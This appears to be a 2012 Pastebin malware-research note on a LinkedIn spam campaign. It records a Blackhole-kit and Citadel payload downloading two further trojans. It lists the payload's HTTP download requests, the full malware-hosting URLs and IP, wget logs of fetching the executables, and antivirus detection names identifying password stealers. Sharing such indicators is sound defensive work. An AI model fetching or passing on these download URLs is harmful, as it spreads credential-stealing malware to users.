unixfreaxjp

The BHEK2 Citadel Download these two more...

Oct 17th, 2012
94
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. *) Previous report: http://pastebin.com/raw.php?i=z7n6SVxf
  2. *) Continuation of the Linkedin Spam, BHEK2, PluginDetect e,f, and Citadel InfoStealer(CRYPT to POST/HTTP) AND... finally that payload downloaded THESE TWO MORE Trojans.....
  3.  
  4. * GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
  5. * GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
  6.  
  7. --15:43:09-- http://3073.a.hostable.me/Z2U.exe
  8. => `Z2U.exe'
  9. Resolving 3073.a.hostable.me... 204.152.255.3
  10. Connecting to 3073.a.hostable.me|204.152.255.3|:80... connected.
  11. HTTP request sent, awaiting response... 200 OK
  12. Length: 407,128 (398K) [application/x-msdownload]
  13. 15:43:12 (180.00 KB/s) - `Z2U.exe' saved [407128/407128]
  14.  
  15.  
  16. --15:43:44-- http://85.18.21.252/PNV3Hbi.exe
  17. => `PNV3Hbi.exe'
  18. Connecting to 85.18.21.252:80... connected.
  19. HTTP request sent, awaiting response... 200 OK
  20. Length: 407,128 (398K) [application/x-msdos-program]
  21. 15:43:49 (93.95 KB/s) - `PNV3Hbi.exe' saved [407128/407128]
  22.  
  23. VT:
  24. https://www.virustotal.com/file/fed6336f6a8e4d09d83a9eff1485276434be3377012f7bafc99474bd0a7ce162/analysis/1350456794/
  25. DrWeb : Trojan.PWS.Panda.3001
  26. Norman : W32/Krypt.GB
  27. McAfee-GW-Edition : PWS-Zbot.gen.aln
  28. nProtect : Trojan/W32.Agent.407128.B
  29. McAfee : PWS-Zbot.gen.aln
  30. Fortinet : W32/Kryptik.WDV!tr
  31. Kingsoft : Win32.Troj.Agent.ai.(kcloud)
  32. Panda : Suspicious file
  33.  
  34. #MalwareMustDie!!!
RAW Paste Data Copied